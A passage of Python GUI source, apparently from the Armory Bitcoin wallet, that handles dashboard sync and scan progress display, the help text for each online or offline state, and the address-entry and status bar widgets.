self.barProgressScan.setFormat('')
self.barProgressBuild.setValue(0)
self.barProgressBuild.setRange(0,0)
self.lblTimeLeftBuild.setVisible(False)
elif phase==Cpp.BDMPhase_SearchHashes:
self.lblDashModeBuild.setText( self.tr('Build Databases'), \
size=4, bold=True, color='DisableFG')
self.lblDashModeScan.setText( self.tr('Parsing Tx Hashes'), \
size=4, bold=True, color='Foreground')
self.lblTimeLeftBuild.setVisible(False)
self.barProgressBuild.setFormat('')
self.barProgressBuild.setValue(100)
self.barProgressBuild.setRange(0,100)
self.lblTimeLeftScan.setVisible(False)
self.barProgressScan.setFormat('')
self.barProgressScan.setValue(0)
self.barProgressScan.setRange(0,0)
self.lblTimeLeftScan.setVisible(False)
elif phase==Cpp.BDMPhase_ResolveHashes:
self.lblDashModeBuild.setText( self.tr('Build Databases'), \
size=4, bold=True, color='DisableFG')
self.lblDashModeScan.setText( self.tr('Resolving Tx Hashes'), \
size=4, bold=True, color='Foreground')
self.lblTimeLeftBuild.setVisible(False)
self.barProgressBuild.setFormat('')
self.barProgressBuild.setValue(100)
self.barProgressBuild.setRange(0,100)
self.lblTimeLeftBuild.setVisible(False)
self.barProgressScan.setFormat('')
self.barProgressScan.setValue(100)
self.barProgressScan.setRange(0,100)
self.barProgressScan.setFormat('%p%')
showPct = True
if tleft != 2**32 - 1:
tstring = secondsToHumanTime(tleft)
else:
tstring = "N/A"
showPct = False
pvalue = pct*100
if showPct:
if phase==BDMPhase_BlockHeaders or phase==BDMPhase_BlockData or phase==BDMPhase_DBHeaders:
self.lblTimeLeftBuild.setText(tstring)
self.barProgressBuild.setValue(pvalue)
elif phase==BDMPhase_Rescan or BDMPhase_ResolveHashes:
self.lblTimeLeftScan.setText(tstring)
self.barProgressScan.setValue(pvalue)
self.lblTimeLeftScan.setVisible(True)
elif sdmStr in ['NodeStatus_Initializing','NodeStatus_Syncing']:
self.lblDashModeSync.setVisible(True)
self.barProgressSync.setVisible(True)
self.lblTimeLeftSync.setVisible(True)
self.barProgressSync.setFormat('%p%')
self.barProgressSync.setRange(0,100)
self.lblDashModeBuild.setVisible(True)
self.barProgressBuild.setVisible(True)
self.lblTimeLeftBuild.setVisible(False)
self.barProgressBuild.setValue(0)
self.barProgressBuild.setFormat('')
self.lblDashModeScan.setVisible(True)
self.barProgressScan.setVisible(True)
self.lblTimeLeftScan.setVisible(False)
self.barProgressScan.setValue(0)
self.barProgressScan.setFormat('')
if sdmStr == 'NodeStatus_Syncing':
sdmPercent = sdmState.chainState_.getProgressPct() * 100
self.lblTimeLeftSync.setText(\
"%d blocks remaining" % sdmState.chainState_.getBlocksLeft())
elif sdmStr == 'NodeStatus_Initializing':
sdmPercent = 0
self.barProgressSync.setRange(0,0)
self.barProgressBuild.setFormat('')
self.barProgressScan.setFormat('')
else:
LOGERROR('Should not predict sync info in non init/sync SDM state')
return ('UNKNOWN','UNKNOWN', 'UNKNOWN')
self.barProgressSync.setValue(sdmPercent)
else:
LOGWARN('Called updateSyncProgress while not sync\'ing')
#############################################################################
def GetDashFunctionalityText(self, func):
"""
Outsourcing all the verbose dashboard text to here, to de-clutter the
logic paths in the setDashboardDetails function
"""
if func.lower() == 'scanning':
return self.tr( \
'The following functionalities are available while scanning in offline mode:'
'<ul>'
'<li>Create new wallets</li>'
'<li>Generate receiving addresses for your wallets</li>'
'<li>Create backups of your wallets (printed or digital)</li>'
'<li>Change wallet encryption settings</li>'
'<li>Sign transactions created from an online system</li>'
'<li>Sign messages</li>'
'</ul>'
'<br><br><b>NOTE:</b> The Bitcoin network <u>will</u> process transactions '
'to your addresses, even if you are offline. It is perfectly '
'okay to create and distribute payment addresses while Armory is offline, '
'you just won\'t be able to verify those payments until the next time '
'Armory is online.')
elif func.lower() == 'offline':
return self.tr( \
'The following functionalities are available in offline mode:'
'<ul>'
'<li>Create, import or recover wallets</li>'
'<li>Generate new receiving addresses for your wallets</li>'
'<li>Create backups of your wallets (printed or digital)</li>'
'<li>Import private keys to wallets</li>'
'<li>Change wallet encryption settings</li>'
'<li>Sign messages</li>'
'<li><b>Sign transactions created from an online system</b></li>'
'</ul>'
'<br><br><b>NOTE:</b> The Bitcoin network <u>will</u> process transactions '
'to your addresses, regardless of whether you are online. It is perfectly '
'okay to create and distribute payment addresses while Armory is offline, '
'you just won\'t be able to verify those payments until the next time '
'Armory is online.')
elif func.lower() == 'online':
return self.tr( \
'<ul>'
'<li>Create, import or recover Armory wallets</li>'
'<li>Generate new addresses to receive coins</li>'
'<li>Send bitcoins to other people</li>'
'<li>Create one-time backups of your wallets (in printed or digital form)</li>'
'<li>Click on "bitcoin:" links in your web browser '
'(not supported on all operating systems)</li>'
'<li>Import private keys to wallets</li>'
'<li>Monitor payments to watching-only wallets and create '
'unsigned transactions</li>'
'<li>Sign messages</li>'
'<li><b>Create transactions with watching-only wallets, '
'to be signed by an offline wallets</b></li>'
'</ul>')
#############################################################################
def GetDashStateText(self, mgmtMode, state):
"""
Outsourcing all the verbose dashboard text to here, to de-clutter the
logic paths in the setDashboardDetails function
"""
# A few states don't care which mgmtMode you are in...
if state == 'NewUserInfo':
return self.tr(
'For more information about Armory, and even Bitcoin itself, you should '
'visit the <a href="https://bitcointalk.org/index.php?board=97.0">Armory Forum</a> '
'and <a href="https://bitcoin.org">Bitcoin.org</a>. If '
'you are experiencing problems using this software, please visit the '
'<a href="https://bitcointalk.org/index.php?board=97.0">Armory Forum</a>. Users '
'there will help you with any issues that you have. '
'<br><br>'
'<b><u>IMPORTANT:</u></b> Make a backup of your wallet(s)! Paper '
'backups protect you <i>forever</i> against forgotten passwords, '
'hard-drive failure, and make it easy for your family to recover '
'your funds if something terrible happens to you. <i>Each wallet '
'only needs to be backed up once, ever!</i> Without it, you are at '
'risk of losing all of your Bitcoins! '
'<br><br>')
elif state == 'OnlineFull1':
return self.tr( \
'<p><b>You now have access to all the features Armory has to offer!</b><br>'
'To see your balances and transaction history, please click '
'on the "Transactions" tab above this text. <br>'
'Here\'s some things you can do with Armory Bitcoin Client:'
'<br>')
elif state == 'OnlineFull2':
return ( \
(self.tr('If you experience any performance issues with Armory, '
'please confirm that Bitcoin Core is running and <i>fully '
'synchronized with the Bitcoin network</i>. You will see '
'a green checkmark in the bottom right corner of the '
'Bitcoin Core window if it is synchronized. If not, it is '
'recommended you close Armory and restart it only when you '
'see that checkmark.'
'<br><br>') if not self.doAutoBitcoind else '') + self.tr(
'<b>Please backup your wallets!</b> Armory wallets are '
'"deterministic", meaning they only need to be backed up '
'one time (unless you have imported external addresses/keys). '
'Make a backup and keep it in a safe place! All funds from '
'Armory-generated addresses will always be recoverable with '
'a paper backup, any time in the future. Use the "Backup '
'Individual Keys" option for each wallet to backup imported '
'keys.</p>'))
elif state == 'OnlineNeedSweep':
return self.tr( \
'Armory is currently online, but you have requested a sweep operation '
'on one or more private keys. This requires searching the global '
'transaction history for the available balance of the keys to be '
'swept. '
'<br><br>'
'Press the button to start the blockchain scan, which '
'will also put Armory into offline mode for a few minutes '
'until the scan operation is complete.')
elif state == 'OnlineDirty':
return self.tr( \
'<b>Wallet balances may '
'be incorrect until the rescan operation is performed!</b>'
'<br><br>'
'Armory is currently online, but addresses/keys have been added '
'without rescanning the blockchain. You may continue using '
'Armory in online mode, but any transactions associated with the '
'new addresses will not appear in the ledger. '
'<br><br>'
'Pressing the button above will put Armory into offline mode '
'for a few minutes until the scan operation is complete.')
elif state == 'OfflineNoSatoshiNoInternet':
return self.tr( \
'There is no connection to the internet, and there is no other '
'Bitcoin software running. Most likely '
'you are here because this is a system dedicated '
'to manage offline wallets! '
'<br><br>'
'<b>If you expected Armory to be in online mode</b>, '
'please verify your internet connection is active, '
'then restart Armory. If you think the lack of internet '
'connection is in error (such as if you are using Tor), '
'then you can restart Armory with the "--skip-online-check" '
'option, or change it in the Armory settings.'
'<br><br>'
'If you do not have Bitcoin Core installed, you can '
'download it from <a href="https://bitcoin.org">'
'https://bitcoin.org</a>.')
# Branch the available display text based on which Satoshi-Management
# mode Armory is using. It probably wasn't necessary to branch the
# the code like this, but it helped me organize the seemingly-endless
# number of dashboard screens I need
if mgmtMode.lower()=='user':
if state == 'OfflineButOnlinePossible':
return self.tr( \
'You are currently in offline mode, but can '
'switch to online mode by pressing the button above. However, '
'it is not recommended that you switch until '
'Bitcoin Core/bitcoind is fully synchronized with the bitcoin network. '
'You will see a green checkmark in the bottom-right corner of '
'the Bitcoin Core window when it is finished.'
'<br><br>'
'Switching to online mode will give you access '
'to more Armory functionality, including sending and receiving '
'bitcoins and viewing the balances and transaction histories '
'of each of your wallets.<br><br>')
elif state == 'OfflineNoSatoshi':
bitconf = os.path.join(BTC_HOME_DIR, 'bitcoin.conf')
return self.tr( \
'You are currently in offline mode because '
'Bitcoin Core is not running. To switch to online '
'mode, start Bitcoin Core and let it synchronize with the network '
'-- you will see a green checkmark in the bottom-right corner when '
'it is complete. If Bitcoin Core is already running and you believe '
'the lack of connection is an error (especially if using proxies), '
'please see <a href="'
'https://bitcointalk.org/index.php?topic=155717.msg1719077#msg1719077">'
'this link</a> for options.'
'<br><br>'
'<b>If you prefer to have Armory do this for you</b>, '
'then please check "Let Armory run '
'Bitcoin Core in the background" under "File"->"Settings."'
'<br><br>'
'If you already know what you\'re doing and simply need '
'to fetch the latest version of Bitcoin Core, you can download it from '
'<a href="https://bitcoin.org">https://bitcoin.org</a>.')
elif state == 'OfflineNoInternet':
return self.tr( \
'You are currently in offline mode because '
'Armory could not detect an internet connection. '
'If you think this is in error, then '
'restart Armory using the " --skip-online-check" option, '
'or adjust the Armory settings. Then restart Armory.'
'<br><br>'
'If this is intended to be an offline computer, note '
'that it is not necessary to have Bitcoin Core or bitcoind '
'running.' )
elif state == 'OfflineNoBlkFiles':
return self.tr( \
'You are currently in offline mode because '
'Armory could not find the blockchain files produced '
'by Bitcoin Core. Do you run Bitcoin Core (or bitcoind) '
'from a non-standard directory? Armory expects to '
'find the blkXXXX.dat files in <br><br>%1<br><br> '
'If you know where they are located, please restart '
'Armory using the " --satoshi-datadir=[path]" '
'to notify Armory where to find them.').arg(BLKFILE_DIR)
elif state == 'Disconnected':
return self.tr( \
'Armory was previously online, but the connection to Bitcoin Core/'
'bitcoind was interrupted. You will not be able to send bitcoins '
'or confirm receipt of bitcoins until the connection is '
'reestablished. <br><br>Please check that Bitcoin Core is open '
'and synchronized with the network. Armory will <i>try to '
'reconnect</i> automatically when the connection is available '
'again. If Bitcoin Core is available again, and reconnection does '
'not happen, please restart Armory.<br><br>')
elif state == 'ScanNoWallets':
return self.tr( \
'Please wait while the global transaction history is scanned. '
'Armory will go into online mode automatically, as soon as '
'the scan is complete.')
elif state == 'ScanWithWallets':
return self.tr( \
'Armory is scanning the global transaction history to retrieve '
'information about your wallets. The "Transactions" tab will '
'be updated with wallet balance and history as soon as the scan is '
'complete. You may manage your wallets while you wait.<br><br>')
else:
LOGERROR('Unrecognized dashboard state: Mgmt:%s, State:%s', \
mgmtMode, state)
return ''
elif mgmtMode.lower()=='auto':
if state == 'OfflineBitcoindRunning':
return self.tr( \
'It appears you are already running Bitcoin software '
'(Bitcoin Core or bitcoind). '
'Unlike previous versions of Armory, you should <u>not</u> run '
'this software yourself -- Armory '
'will run it in the background for you. Either close the '
'Bitcoin application or adjust your settings. If you change '
'your settings, then please restart Armory.')
if state == 'OfflineNeedBitcoinInst':
return self.tr( \
'<b>Only one more step to getting online with Armory!</b> You '
'must install the Bitcoin software from https://bitcoin.org in order '
'for Armory to communicate with the Bitcoin network. If the '
'Bitcoin software is already installed and/or you would prefer '
'to manage it yourself, please adjust your settings and '
'restart Armory.')
if state == 'InitializingLongTime':
return self.tr(
'<b>To maximize your security, the Bitcoin engine is downloading '
'and verifying the global transaction ledger. <u>This will take '
'several hours, but only needs to be done once</u>!</b> It is '
'usually best to leave it running over night for this '
'initialization process. Subsequent loads will only take a few '
'minutes. '
'<br><br> '
'<b>Please Note:</b> Between Armory and the underlying Bitcoin '
'engine, you need to have 120-130 GB of spare disk space available '
'to hold the global transaction history. '
'<br><br> '
'While you wait, you can manage your wallets. Make new wallets, '
'make digital or paper backups, create Bitcoin addresses to receive '
'payments, '
'sign messages, and/or import private keys. You will always '
'receive Bitcoin payments regardless of whether you are online, '
'but you will have to verify that payment through another service '
'until Armory is finished this initialization.')
if state == 'InitializingDoneSoon':
msg = self.tr( \
'The software is downloading and processing the latest activity '
'on the network related to your wallet(s). This should take only '
'a few minutes. While you wait, you can manage your wallet(s). '
'<br><br>'
'Now would be a good time to make paper (or digital) backups of '
'your wallet(s) if you have not done so already! You are protected '
'<i>forever</i> from hard-drive loss, or forgetting your password. '
'If you do not have a backup, you could lose all of your '
'Bitcoins forever!', "", len(self.walletMap))
return msg
if state == 'OnlineDisconnected':
return self.tr( \
'Armory\'s communication with the Bitcoin network was interrupted. '
'This usually does not happen unless you closed the process that '
'Armory was using to communicate with the network. Armory requires '
'%1 to be running in the background, and this error pops up if it '
'disappears.'
'<br><br>You may continue in offline mode, or you can close '
'all Bitcoin processes and restart Armory.').arg(os.path.basename(TheSDM.executable))
if state == 'OfflineBadConnection':
return self.tr( \
'Armory has experienced an issue trying to communicate with the '
'Bitcoin software. The software is running in the background, '
'but Armory cannot communicate with it through RPC as it expects '
'to be able to. If you changed any settings in the Bitcoin home '
'directory, please make sure that RPC is enabled and that it is '
'accepting connections from localhost. '
'<br><br>'
'If you have not changed anything, please export the log file '
'(from the "File" menu) and open an issue at https://github.com/goatpig/BitcoinArmory/issues')
if state == 'OfflineSatoshiAvail':
return self.tr( \
'Armory does not detect internet access, but it does detect '
'running Bitcoin software. Armory is in offline-mode. <br><br>'
'If you are intending to run an offline system, you will not '
'need to have the Bitcoin software installed on the offline '
'computer. It is only needed for the online computer. '
'If you expected to be online and '
'the absence of internet is an error, please restart Armory '
'using the "--skip-online-check" option. ')
if state == 'OfflineForcedButSatoshiAvail':
return self.tr( \
'Armory was started in offline-mode, but detected you are '
'running Bitcoin software. If you are intending to run an '
'offline system, you will <u>not</u> need to have the Bitcoin '
'software installed or running on the offline '
'computer. It is only required for being online. ')
if state == 'OfflineBadDBEnv':
return self.tr( \
'The Bitcoin software indicates there '
'is a problem with its databases. This can occur when '
'Bitcoin Core/bitcoind is upgraded or downgraded, or sometimes '
'just by chance after an unclean shutdown.'
'<br><br>'
'You can either revert your installed Bitcoin software to the '
'last known working version (but not earlier than version 0.8.1) '
'or delete everything <b>except</b> "wallet.dat" from your Bitcoin '
'home directory '
'<font face="courier"><b>%1</b></font>'
'<br><br>'
'If you choose to delete the contents of the Bitcoin home '
'directory, you will have to do a fresh download of the blockchain '
'again, which will require a few hours the first '
'time.').arg(self.satoshiHomePath)
if state == 'OfflineBtcdCrashed':
sout = '' if TheSDM.btcOut==None else str(TheSDM.btcOut)
serr = '' if TheSDM.btcErr==None else str(TheSDM.btcErr)
soutHtml = '<br><br>' + '<br>'.join(sout.strip().split('\n'))
serrHtml = '<br><br>' + '<br>'.join(serr.strip().split('\n'))
soutDisp = '<b><font face="courier">StdOut: %s</font></b>' % soutHtml
serrDisp = '<b><font face="courier">StdErr: %s</font></b>' % serrHtml
if len(sout)>0 or len(serr)>0:
return (self.tr(
'There was an error starting the underlying Bitcoin engine. '
'This should not normally happen. Usually it occurs when you '
'have been using Bitcoin Core prior to using Armory, especially '
'if you have upgraded or downgraded Bitcoin Core recently. '
'Output from bitcoind:<br>') + \
(soutDisp if len(sout)>0 else '') + \
(serrDisp if len(serr)>0 else '') )
else:
return ( self.tr(
'There was an error starting the underlying Bitcoin engine. '
'This should not normally happen. Usually it occurs when you '
'have been using Bitcoin Core prior to using Armory, especially '
'if you have upgraded or downgraded Bitcoin Core recently. '
'<br><br> '
'Unfortunately, this error is so strange, Armory does not '
'recognize it. Please go to "Export Log File" from the "File" '
'menu and submit an issue at https://github.com/goatpig/BitcoinArmory/issues. '
'We apologize for the inconvenience!'))
# TODO - move out of polling and call on events
#############################################################################
def setDashboardDetails(self, INIT=False):
"""
We've dumped all the dashboard text into the above 2 methods in order
to declutter this method.
"""
if self.isShuttingDown:
return
sdmStr = TheSDM.getSDMStateStr()
bdmState = TheBDM.getState()
descr = ''
descr1 = ''
descr2 = ''
# Methods for showing/hiding groups of widgets on the dashboard
def setBtnRowVisible(r, visBool):
for c in range(3):
self.dashBtns[r][c].setVisible(visBool)
def setSyncRowVisible(b):
self.lblDashModeSync.setVisible(b)
self.barProgressSync.setVisible(b)
self.lblTimeLeftSync.setVisible(b)
def setBuildRowVisible(b):
self.lblDashModeBuild.setVisible(b)
self.barProgressBuild.setVisible(b)
self.lblTimeLeftBuild.setVisible(b)
def setScanRowVisible(b):
self.lblDashModeScan.setVisible(b)
self.barProgressScan.setVisible(b)
self.lblTimeLeftScan.setVisible(b)
def setOnlyDashModeVisible():
setSyncRowVisible(False)
setBuildRowVisible(False)
setScanRowVisible(False)
self.lblBusy.setVisible(False)
self.btnModeSwitch.setVisible(False)
self.lblDashModeSync.setVisible(True)
def setBtnFrameVisible(b, descr=''):
self.frmDashMidButtons.setVisible(b)
self.lblDashBtnDescr.setVisible(len(descr)>0)
self.lblDashBtnDescr.setText(descr)
if INIT:
setBtnFrameVisible(False)
setBtnRowVisible(DASHBTNS.Install, False)
setBtnRowVisible(DASHBTNS.Browse, False)
setBtnRowVisible(DASHBTNS.Instruct, False)
setBtnRowVisible(DASHBTNS.Settings, False)
setBtnRowVisible(DASHBTNS.Close, False)
setOnlyDashModeVisible()
if sdmStr != self.lastSDMStr:
if sdmStr == "NodeStatus_Offline":
# User is letting Armory manage the Satoshi client for them.
setSyncRowVisible(False)
self.lblBusy.setVisible(False)
self.btnModeSwitch.setVisible(False)
# There's a whole bunch of stuff that has to be hidden/shown
# depending on the state... set some reasonable defaults here
setBtnFrameVisible(False)
setBtnRowVisible(DASHBTNS.Browse, False)
setBtnRowVisible(DASHBTNS.Settings, True)
setBtnRowVisible(DASHBTNS.Close, False)
if self.internetStatus == INTERNET_STATUS.Unavailable or CLI_OPTIONS.offline:
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, False)
setOnlyDashModeVisible()
self.lblDashModeSync.setText( self.tr('Armory is <u>offline</u>'), \
size=4, color='TextWarn', bold=True)
if TheSDM.satoshiIsAvailable():
self.frmDashMidButtons.setVisible(True)
setBtnRowVisible(DASHBTNS.Close, True)
if CLI_OPTIONS.offline:
# Forced offline but bitcoind is running
LOGINFO('Dashboard switched to auto-OfflineForcedButSatoshiAvail')
descr1 += self.GetDashStateText('Auto', 'OfflineForcedButSatoshiAvail')
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
else:
LOGINFO('Dashboard switched to auto-OfflineSatoshiAvail')
descr1 += self.GetDashStateText('Auto', 'OfflineSatoshiAvail')
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
else:
LOGINFO('Dashboard switched to auto-OfflineNoSatoshiNoInternet')
setBtnFrameVisible(True, \
self.tr('In case you actually do have internet access, you can use '
'the following links to get Armory installed. Or change '
'your settings.'))
setBtnRowVisible(DASHBTNS.Browse, True)
setBtnRowVisible(DASHBTNS.Settings, True)
#setBtnRowVisible(DASHBTNS.Instruct, not OS_WINDOWS)
descr1 += self.GetDashStateText('Auto','OfflineNoSatoshiNoInternet')
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
elif sdmStr == "NodeStatus_BadPath":
setOnlyDashModeVisible()
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, False)
self.lblDashModeSync.setText( self.tr('Armory is <u>offline</u>'), \
size=4, color='TextWarn', bold=True)
LOGINFO('Dashboard switched to auto-cannotFindExeHome')
self.lblDashModeSync.setText(self.tr('Cannot find Bitcoin Home Directory'), \
size=4, bold=True)
setBtnRowVisible(DASHBTNS.Close, TheSDM.satoshiIsAvailable())
setBtnRowVisible(DASHBTNS.Install, True)
setBtnRowVisible(DASHBTNS.Browse, True)
setBtnRowVisible(DASHBTNS.Settings, True)
#setBtnRowVisible(DASHBTNS.Instruct, not OS_WINDOWS)
self.btnModeSwitch.setVisible(True)
self.btnModeSwitch.setText(self.tr('Check Again'))
setBtnFrameVisible(True)
descr1 += self.GetDashStateText('Auto', 'OfflineNeedBitcoinInst')
descr2 += self.GetDashStateText('Auto', 'NewUserInfo')
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
elif sdmStr == "NodeStatus_Initializing" or \
sdmStr == "NodeStatus_Syncing":
self.wasSynchronizing = True
LOGINFO('Dashboard switched to auto-InitSync')
self.lblBusy.setVisible(True)
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, False)
self.updateSyncProgress()
# If torrent ever ran, leave it visible
setSyncRowVisible(True)
setScanRowVisible(True)
if sdmStr == "NodeStatus_Initializing":
self.lblDashModeSync.setText( self.tr('Initializing Bitcoin Engine'), size=4, bold=True, color='Foreground')
elif sdmStr == "NodeStatus_Syncing":
self.lblDashModeSync.setText( self.tr('Synchronizing with Network'), size=4, bold=True, color='Foreground')
self.lblDashModeBuild.setText( self.tr('Build Databases'), \
size=4, bold=True, color='DisableFG')
self.lblDashModeScan.setText( self.tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
descr1 += self.GetDashStateText('Auto', 'InitializingDoneSoon')
descr2 += self.GetDashStateText('Auto', 'NewUserInfo')
setBtnRowVisible(DASHBTNS.Settings, True)
setBtnFrameVisible(True, \
self.tr('Since version 0.88, Armory runs bitcoind in the '
'background. You can switch back to '
'the old way in the Settings dialog. '))
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
self.lastSDMStr = sdmStr
if bdmState == BDM_BLOCKCHAIN_READY:
setOnlyDashModeVisible()
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, True)
self.lblBusy.setVisible(False)
if self.netMode == NETWORKMODE.Disconnected:
self.btnModeSwitch.setVisible(False)
self.lblDashModeSync.setText( self.tr('Armory is disconnected'), size=4, color='TextWarn', bold=True)
descr = self.GetDashStateText('User','Disconnected')
descr += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr)
else:
# Fully online mode
self.btnModeSwitch.setVisible(False)
self.lblDashModeSync.setText( self.tr('Armory is online!'), color='TextGreen', size=4, bold=True)
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, True)
descr = self.GetDashStateText('User', 'OnlineFull1')
descr += self.GetDashFunctionalityText('Online')
descr += self.GetDashStateText('User', 'OnlineFull2')
self.lblDashDescr1.setText(descr)
elif bdmState == BDM_SCANNING or bdmState == BDM_UNINITIALIZED:
LOGINFO('Dashboard switched to "Scanning" mode')
setSyncRowVisible(False)
self.lblDashModeScan.setVisible(True)
self.barProgressScan.setVisible(True)
self.lblTimeLeftScan.setVisible(True)
self.lblBusy.setVisible(True)
self.btnModeSwitch.setVisible(False)
if sdmStr == 'NodeStatus_Ready':
self.barProgressSync.setVisible(True)
self.lblTimeLeftSync.setVisible(True)
self.lblDashModeSync.setVisible(True)
self.lblTimeLeftSync.setText('')
self.lblDashModeSync.setText( self.tr('Synchronizing with Network'), \
size=4, bold=True, color='DisableFG')
else:
self.barProgressSync.setVisible(False)
self.lblTimeLeftSync.setVisible(False)
self.lblDashModeSync.setVisible(False)
if len(unicode(self.lblDashModeBuild.text()).strip()) == 0:
self.lblDashModeBuild.setText( self.tr('Preparing Databases'), \
size=4, bold=True, color='Foreground')
if len(unicode(self.lblDashModeScan.text()).strip()) == 0:
self.lblDashModeScan.setText( self.tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, False)
if len(self.walletMap)==0:
descr = self.GetDashStateText('User','ScanNoWallets')
else:
descr = self.GetDashStateText('User','ScanWithWallets')
descr += self.GetDashStateText('Auto', 'NewUserInfo')
descr += self.GetDashFunctionalityText('Scanning') + '<br>'
self.lblDashDescr1.setText(descr)
self.lblDashDescr2.setText('')
self.mainDisplayTabs.setCurrentIndex(self.MAINTABS.Dash)
elif bdmState == BDM_OFFLINE:
pass
else:
LOGERROR('What the heck blockchain mode are we in? %s', bdmState)
self.lblDashModeSync.setContentsMargins( 50,5,50,5)
self.lblDashModeBuild.setContentsMargins(50,5,50,5)
self.lblDashModeScan.setContentsMargins( 50,5,50,5)
vbar = self.dashScrollArea.verticalScrollBar()
# On Macs, this causes the main window scroll area to keep bouncing back
# to the top. Not setting the value seems to fix it. DR - 2014/02/12
if not OS_MACOSX:
vbar.setValue(vbar.minimum())
if self.lblBusy.isVisible():
self.numHeartBeat += 1
self.lblBusy.setPixmap(QPixmap(':/loadicon_%d.png' % \
(self.numHeartBeat%6)))
#############################################################################
def createToolTipWidget(self, tiptext, iconSz=2):
"""
The <u></u> is to signal to Qt that it should be interpretted as HTML/Rich
text even if no HTML tags are used. This appears to be necessary for Qt
to wrap the tooltip text
"""
fgColor = htmlColor('ToolTipQ')
lbl = QLabel('<font size=%d color=%s>(?)</font>' % (iconSz, fgColor))
lbl.setMaximumWidth(relaxedSizeStr(lbl, '(?)')[0])
def setAllText(wself, txt):
def pressEv(ev):
QWhatsThis.showText(ev.globalPos(), txt, self)
wself.mousePressEvent = pressEv
wself.setToolTip('<u></u>' + txt)
# Calling setText on this widget will update both the tooltip and QWT
from types import MethodType
lbl.setText = MethodType(setAllText, lbl)
lbl.setText(tiptext)
return lbl
#############################################################################
def createAddressEntryWidgets(self, parent, initString='', maxDetectLen=128,
boldDetectParts=0, **cabbKWArgs):
"""
If you are putting the LBL_DETECT somewhere that is space-constrained,
set maxDetectLen to a smaller value. It will limit the number of chars
to be included in the autodetect label.
"cabbKWArgs" is "create address book button kwargs"
Here's the signature of that function... you can pass any named args
to this function and they will be passed along to createAddrBookButton
def createAddrBookButton(parent, targWidget, defaultWltID=None,
actionStr="Select", selectExistingOnly=False,
selectMineOnly=False, getPubKey=False,
showLockboxes=True)
Returns three widgets that can be put into layouts:
[[QLineEdit: addr/pubkey]] [[Button: Addrbook]]
[[Label: Wallet/Lockbox/Addr autodetect]]
"""
addrEntryObjs = {}
addrEntryObjs['QLE_ADDR'] = QLineEdit()
addrEntryObjs['QLE_ADDR'].setText(initString)
addrEntryObjs['BTN_BOOK'] = createAddrBookButton(parent,
addrEntryObjs['QLE_ADDR'],
**cabbKWArgs)
addrEntryObjs['LBL_DETECT'] = QRichLabel('')
addrEntryObjs['CALLBACK_GETSCRIPT'] = None
##########################################################################
# Create a function that reads the user string and updates labels if
# the entry is recognized. This will be used to automatically show the
# user that what they entered is recognized and gives them more info
#
# It's a little awkward to put this whole thing in here... this could
# probably use some refactoring
def updateAddrDetectLabels():
try:
enteredText = str(addrEntryObjs['QLE_ADDR'].text()).strip()
scriptInfo = self.getScriptForUserString(enteredText)
displayInfo = self.getDisplayStringForScript(
scriptInfo['Script'], maxDetectLen, boldDetectParts,
prefIDOverAddr=scriptInfo['ShowID'])
dispStr = displayInfo['String']
if displayInfo['WltID'] is None and displayInfo['LboxID'] is None:
addrEntryObjs['LBL_DETECT'].setText(dispStr)
else:
addrEntryObjs['LBL_DETECT'].setText(dispStr, color='TextBlue')
# No point in repeating what the user just entered
addrEntryObjs['LBL_DETECT'].setVisible(enteredText != dispStr)
addrEntryObjs['QLE_ADDR'].setCursorPosition(0)
except:
#LOGEXCEPT('Invalid recipient string')
addrEntryObjs['LBL_DETECT'].setVisible(False)
addrEntryObjs['LBL_DETECT'].setVisible(False)
# End function to be connected
##########################################################################
# Now actually connect the entry widgets
parent.connect(addrEntryObjs['QLE_ADDR'], SIGNAL('textChanged(QString)'),
updateAddrDetectLabels)
updateAddrDetectLabels()
# Create a func that can be called to get the script that was entered
# This uses getScriptForUserString() which actually returns 4 vals
# rawScript, wltIDorNone, lboxIDorNone, addrStringEntered
# (The last one is really only used to determine what info is most
# relevant to display to the user...it can be ignored in most cases)
def getScript():
entered = str(addrEntryObjs['QLE_ADDR'].text()).strip()
return self.getScriptForUserString(entered)
addrEntryObjs['CALLBACK_GETSCRIPT'] = getScript
return addrEntryObjs
#############################################################################
def getScriptForUserString(self, userStr):
return getScriptForUserString(userStr, self.walletMap, self.allLockboxes)
#############################################################################
def getDisplayStringForScript(self, binScript, maxChars=256,
doBold=0, prefIDOverAddr=False,
lblTrunc=12, lastTrunc=12):
return getDisplayStringForScript(binScript, self.walletMap,
self.allLockboxes, maxChars, doBold,
prefIDOverAddr, lblTrunc, lastTrunc)
#############################################################################
def updateWalletData(self):
for wltid in self.walletMap:
self.walletMap[wltid].getBalancesAndCountFromDB()
self.walletMap[wltid].getAddrDataFromDB()
for lbid in self.cppLockboxWltMap:
self.cppLockboxWltMap[lbid].getBalancesAndCountFromDB(\
TheBDM.topBlockHeight, IGNOREZC)
#############################################################################
def updateStatusBarText(self):
if self.nodeStatus.status_ == Cpp.NodeStatus_Online:
haveRPC = (self.nodeStatus.rpcStatus_ == RpcStatus_Online)
if haveRPC:
self.lblArmoryStatus.setText(\
self.tr('<font color=%1>Connected (%2 blocks)</font> ').arg(
htmlColor('TextGreen'), str(TheBDM.getTopBlockHeight())))
else:
self.lblArmoryStatus.setText(\
self.tr('<font color=%1><b>Connected (%2 blocks)</b></font> ').arg(
htmlColor('TextPurple'), str(TheBDM.getTopBlockHeight())))
def getToolTipTextOnline():
tt = QString()
if not haveRPC:
tt = self.tr('RPC disabled!<br><br>')
blkRecvAgo = RightNow() - self.blkReceived
